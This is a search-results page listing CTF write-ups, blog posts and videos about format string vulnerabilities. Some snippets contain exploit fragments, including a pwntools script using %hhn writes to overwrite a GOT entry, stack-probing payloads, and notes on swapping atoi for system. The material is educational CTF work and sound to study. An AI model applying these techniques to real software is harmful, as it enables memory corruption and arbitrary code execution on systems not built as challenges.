GitHub
github.com › voydstack › FCSC2022 › blob › main › pwn › formatage › README.md
FCSC2022/pwn/formatage/README.md at main · voydstack/FCSC2022
The challenger basically had to exploit a one-shot format string in one of its hardest form. ... $ file formatage formatage: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /home/n7student/Documents/CTF/FCSC2022/pwn/formatage/lib/ld-2.34.so, BuildID[sha1]=39a11f9a8688c39d7943b084fb7a6f81617573b9, for GNU/Linux 3.2.0, stripped $ checksec ./formatage [*] '/home/n7student/Documents/CTF/FCSC2022/pwn/formatage/formatage' Arch: amd64-64-little RELRO: Full RELRO Stack: No canary found NX: NX enabled PIE: PIE enabled
Author voydstack
CTFtime.org
ctftime.org › writeup › 14315
CTFtime.org / ENCRYPT CTF / pwn4 / Writeup
Format string bugs can be tricky. Because the pointer in the jump slot usually points into libc, we'll need to overwrite all 4 bytes - no getting away with a partial overwrite. We'll also need to do some stack popping. We can do that by entering a recognizable string ("AAAA"), then use the `%x` specifier to look for the hex values for that string on the stack. ``` $ python -c 'print "AAAA" + "x."*10' | ./pwn4 Do you swear to use this shell with responsility by the old gods and the new?
Videos
09:48
[Write Up CTF] COMPFEST12 2020 - Format String Ez | Pwn - YouTube
16:31
Intro Format String Vulnerability | PicoCTF 2017 [39] "I've Got ...
13:25
Format String to dump binary and gain RCE - 33c3ctf ESPR (pwn 150) ...
07:41
Format string exploit on an arduino - rhme2 Casino (pwn 150) - YouTube
19:44
Format String printf Vulnerabilities (PicoCTF 2022 #46 'flag-leak') ...
pico2024 format string 0 - YouTube
tripoloski blog
tripoloski1337.github.io › ctf › 2020 › 06 › 11 › format-string-bug.html
Exploiting Format String bug | tripoloski blog
June 11, 2020 - from pwn import * exit_got = 0x0804c018 get_shell = 0x080491F6 r = process("./chall") gdb.attach(r) p = "AAAA" p += p32(exit_got) p += p32(exit_got+1) p += "%{}c%7$hhn".format((0xf6 - 12) & 0xff) p += "%{}c%8$hhn".format((0x91 - 0xf6) & 0xff) r.sendline(p) r.interactive()
GitHub
github.com › InfoSecIITR › write-ups › blob › master › 2016 › 33c3-ctf-2016 › pwn › espr › README.md
write-ups/2016/33c3-ctf-2016/pwn/espr/README.md at master · InfoSecIITR/write-ups
from pwn import * conn = remote('78.46.224.86', 1337) context.update(arch='amd64', os='linux') Looking at the image, we know that it is a format string vulnerability. As a way of abstracting the payload string, we write an exec_payload, which prepends a tag (P0WN), and uses it as a way of ensuring cleaner execution.
Author InfoSecIITR
zc00l blog
0x00-0x00.github.io › ctf, › write-up › 2019 › 01 › 05 › HTOPwned-Pwn2-Writeup.html
Solving Pwn-02 from e-Security 2018 CTF | zc00l blog
May 1, 2019 - If it was static declared string, it would not be possible, due to being a Read-Only memory address space. But as we observed from before, it is heap memory, so it globally writeable memory, so it is possible to corrupt as well! It is exactly the same methodology as we have done to bypass strcmp() call, so I will not replay everything I told in the last topic, instead, I will show how the code changes have gone to achieve this objective: #!/usr/bin/env python from pwn import * from time import sleep def get_pointer_addr(process): return int(process.recvuntil("\n").strip("\n"), 16) p = process(
GitHub
github.com › tj-oconnor › ctf-writeups
GitHub - tj-oconnor/ctf-writeups: Occasional write-ups from Capture the Flag (CTF) competitions (mostly pwn).
Occasional write-ups from Capture the Flag (CTF) competitions (mostly pwn). - tj-oconnor/ctf-writeups
Starred by 19 users
Forked by 4 users
Languages Python 86.4% | C 13.4% | Dockerfile 0.2% | Python 86.4% | C 13.4% | Dockerfile 0.2%
GitHub
github.com › ctfs › write-ups-2015 › tree › master › camp-ctf-2015 › pwn › hacker_level-200
write-ups-2015/camp-ctf-2015/pwn/hacker_level-200 at master · ctfs/write-ups-2015
Looks like we have to set a breakpoint in gdb at 0x0804860c to avoid bruteforcing the correct offset for our Format String Exploit: gdb-peda$ b *0x0804860c Breakpoint 1 at 0x804860c: file hacker_level.c, line 21. gdb-peda$ r Starting program: /home/vbox/pwn/tasks/camp-hackercalc/hacker_level What's your name?
Author ctfs
Cotonne does Craft!
cotonne.github.io › binary › 2020 › 07 › 14 › format-string.html
Exploiting Format String with PwnTools | Cotonne does Craft!
July 14, 2020 - >>> from pwn import * >>> ELF('exploitme') [*] '/home/yvan/tmp/defense/exploitme' Arch: amd64-64-little RELRO: Full RELRO Stack: Canary found NX: NX enabled PIE: PIE enabled
Violenttestpen
violenttestpen.github.io › ctf › pwn › 2021 › 06 › 06 › zh3r0-ctf-2021
Zh3R0 CTF 2021 · ViolentTestPen
To increase the printed bytes up to 0x7fff08629be7, we’ll need to print another 0x7fff08629be7 - 0x7ffff7a03bf7 - 8 = 186326 bytes. Don’t worry if the padding is very long; as we’re simply writing to /dev/null, printing will be relatively quick. Our final format string looks like this:
CTFtime.org
ctftime.org › writeup › 37314
CTFtime.org / n00bzCTF 2023 / Strings / Writeup
Firstly, we can access a relative argument passed to printf, by adding a number to the format string. For example ``%5$s`` would print the string found at the 5th address on the stack. Well, it would, if it were a 32-bits binary. But on 64-bits it gets even better - the first arguments that printf looks at are the registers. (as the following [repo](https://github.com/Mymaqn/The-danger-of-repetivive-format-string-vulnerabilities-and-abusing-exit-on-full-RELRO) suggests).
GitHub
github.com › nobodyisnobody › write-ups
GitHub - nobodyisnobody/write-ups: Write-ups for various CTF · GitHub
abuse format string in snprintf to have a write anywhere primitive then overwrite exit got entry with _start, then overwrite atoi with printf for leaks then overwrite atoi() with system() for code execution
Starred by 217 users
Forked by 18 users
Languages Python 71.2% | C 18.7% | C++ 5.5% | Dockerfile 2.1% | Forth 1.0% | Shell 0.7%
Mahaloz
ctf-wiki.mahaloz.re › pwn › linux › fmtstr › fmtstr_example
Format String Vulnerability Example - CTF Wiki EN
The corresponding binary file is ... perform pwn. In fact, this is similar to BROP, but BROP uses stack overflow, and here We are using a format string vulnerability. In general, we follow the steps below ... Since I didn't find the source code after the game, I simply constructed two questions. Both the source and deployment files are placed in the corresponding folder [fmt_blind_stack] (https://github.com/ctf-wiki/ctf-...
GitHub
github.com › guyinatuxedo › ctf
GitHub - guyinatuxedo/ctf · GitHub
x86: backdoorctf/bbpwn Format String, got overwrite, system imported function · x86: tokyowesterns16/pwn/greeting Format String, .fini_array write to cause loop back, overwrite got address with plt system
Starred by 111 users
Forked by 25 users
Languages Python 75.9% | Assembly 13.3% | C 10.7% | Makefile 0.1%
GitHub
github.com › Sudoite › ctf-writeups
GitHub - Sudoite/ctf-writeups: Writeups for various CTF challenges · GitHub
Echo Back (PicoCTF 2018): implementation of a library function to perform format string writes to arbitrary locations in memory for 32-bit architectures. This problem had multiple possible solutions and mine was quite different. Terminator Canary (HackIT 2017): I used 32-bit ARM shellcode to solve this challenge. Choose (PicoCTF 2017): 32-bit Linux x86 shellcode to execute execve, split into 11-byte sections and using relative jumps to string the shellcode together. pwn3 (TAMUCTF 2019): simple Linux x86 shellcode, executed on the stack.
Author Sudoite
CTFtime.org
ctftime.org › writeup › 16273
WRITEUP BLACK ECHO (blind format string)
Original writeup (https://github.com/beerpwn/ctf/tree/master/2019/redpwn_ctf/black_echo).
pwnthem0le
pwnthemole.github.io › pwn › 2018 › 09 › 14 › icectffermat.html
IceCTF 2018 - Fermat string Writeup | pwnthem0le
September 14, 2018 - NX enabled, PIE disabled, binary is statically linked. We have a way to write over memory (format strings) and a way to fill the stack with arbitrary input (USER env variable copied in buf).
GitHub
github.com › guyinatuxedo › ctf › blob › master › README.md
ctf/README.md at master · guyinatuxedo/ctf
x86: backdoorctf/bbpwn Format String, got overwrite, system imported function · x86: tokyowesterns16/pwn/greeting Format String, .fini_array write to cause loop back, overwrite got address with plt system
Author guyinatuxedo
GitHub
github.com › hzqmwne › my-ctf-challenges › blob › master › 0CTF_TCTF-2020-Quals › simple_echoserver › writeup › writeup_en.md
my-ctf-challenges/0CTF_TCTF-2020-Quals/simple_echoserver/writeup/writeup_en.md at master · hzqmwne/my-ctf-challenges
First, we can do stack pivot: use %7$hhn as format string to change the lowest byte in 0x7fffffffe280. After two "leave" instructions (just before function main returns), the changed value will move into RSP.
Author hzqmwne
GitHub
github.com › VulnHub › ctf-writeups › blob › master › 2015 › whitehat-ctf › pwn100.md
ctf-writeups/2015/whitehat-ctf/pwn100.md at master · VulnHub/ctf-writeups
This hinted at a format string vulnerability! If there is no % character present, a flag in the structure on the heap will be set to 1. If not, the flag will be 0. This value is later checked and the binary will print: bas@tritonal:~/tmp/wh/pwn100$ ./pwn100 %% AA ======== T1Verify 0 %% Not verify , content?
Author VulnHub